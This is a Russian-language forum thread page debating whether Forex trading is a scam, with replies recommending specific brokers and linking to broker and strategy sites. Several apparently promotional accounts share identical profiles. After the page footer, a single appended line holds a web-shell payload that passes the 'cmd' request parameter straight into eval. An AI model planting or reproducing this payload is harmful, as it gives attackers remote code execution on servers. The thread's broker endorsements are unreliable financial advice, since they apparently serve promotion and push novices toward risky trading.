+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 12

Тема: Форекс - лохотрон или заработок для избранных?


  1. #1
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136

    Форекс - лохотрон или заработок для избранных?

    Форекс - лохотрон или заработок для избранных? Много читал о форексе, отзывы о брокеров форекс, хочу попробовать, но боюсь потерять свой первый депозит. Как думаете, стоит ли начинать, может ли это дать постоянный заработок если подойти к обучению серьезно?

  2. #2
    Главное - выбрать надежного брокера. Надо вообще для начала понимать какие брокеры бывают - если попадете на полную кухню, то даже если у них и заработаете что-то, то вряд ли вывести сможете. Это полные мошенники. самые надежные те кто получили лицензию нашего центрального банка. Например Финам, но у таких брокеров очень высокий входной порог, обычно от 100 000 в зеленых) Так что думайте как торговать хотите - надежно и честно у надежного брокера, но рисковать придется огромной суммой. Либо найти полу-кухню, которая точно выплачивает деньги, но могут вставлять палки в колеса во время торгов.

  3. #3
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Зарабатывать на этом однозначно можно, определенное время. Я знаю людей, которые на этом очень хорошо поднялись и зарабатывали длительное время на форекс. Но все они со временем теряли полностью депозит, однако уже после того как его окупили несколько раз. Знаю и тех кто не смог подняться на этом с первого раза и просто забили. Вам решать конечно, но главное, как выше писали - не связывайтесь с кухонными брокерами.

  4. #4
    У нас в СНГ есть только несколько хороший полу-кухонных брокеров, которые точно платят своим клиентам, хоть и скрипя сквозь зубы, требуя лишний десяток раз копию пачку документов, когда оставляешь заявку на вывод, тем самым оттягиваю выплату, но платят. Под эту категорию подходят такие брокеры как Форекс Клуб, Альпари - http://broker-foreks.ru/alpari.html , ну и еще может парачку других, чье название я не запомнил. Но двух я уже назвал с которых можно начать работу.

  5. #5
    Мимо проходил MihaV is on a distinguished road Аватар для MihaV
    Регистрация
    29.11.2017
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    54
    Удобный интернет-ресурс, окажется полезным многим Forex-игрокам

  6. #6
    Мимо проходил garton is on a distinguished road Аватар для garton
    Регистрация
    24.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    72
    Форекс для многих это денежная жила, еще бы: сидишь дома, торгуешь себе потихоньку, и при этом тебе потихоньку капают денежки! Многие на этом живут и вполне неплохо я вам скажу! Но просто так зарабатывать деньги тоже не получится, нужно какую-то стратегию придумать или разработать, только тогда будет результат какой-то. Вот тут можете посмотреть лучшие стратегии форекс https://strategy4you.ru/category/str...ashhix-srednix, может какую-то и себе присмотрите.

  7. #7
    Мимо проходил Tolik-R is on a distinguished road Аватар для Tolik-R
    Регистрация
    13.09.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    10
    У всех разные мнения. Лично я считаю, что заработать там можно, но нужно быть подкованным и следить за новостями рынка и постоянно анализировать его. В противном случае слив катастрофический сбой неизбежен

  8. #8
    Мимо проходил Herow is on a distinguished road Аватар для Herow
    Регистрация
    13.09.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Вы, несомненно, правы. Сам также считаю. Без труда не ватащить и рыбки из пруда, халявы с деньгами не бывает - это только для жаждущих лёгкой наживы и все прекрасно знают, к чему обычно это приводит. В общем, сложить своё мнение да и просто посмотреть можно с помощью FAQ http://www.forexprotrader.ru/faq. Кто, что думает ? Всем толдько в +, если выскажитесь и вы

  9. #9
    Мимо проходил маня is on a distinguished road Аватар для маня
    Регистрация
    29.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Можете попробовать. У многих форекс брокеров есть демо счета на которых можно потренироваться торговать.

  10. #10
    Мимо проходил Jony1990 is on a distinguished road Аватар для Jony1990
    Регистрация
    22.04.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    15
    ДА , там можно подняться. Но вот дело в том, что прогореть можно так же легко ))

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Дополнительный заработок
    от Pinta в разделе Бизнес
    Ответов: 31
    Последнее сообщение: 28.09.2020, 16:20
  2. Заработок
    от martin в разделе Курилка
    Ответов: 6
    Последнее сообщение: 03.08.2019, 09:29
  3. Заработок
    от volter в разделе Курилка
    Ответов: 6
    Последнее сообщение: 12.06.2019, 13:15
  4. Заработок
    от masik в разделе Курилка
    Ответов: 7
    Последнее сообщение: 19.02.2019, 20:53

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}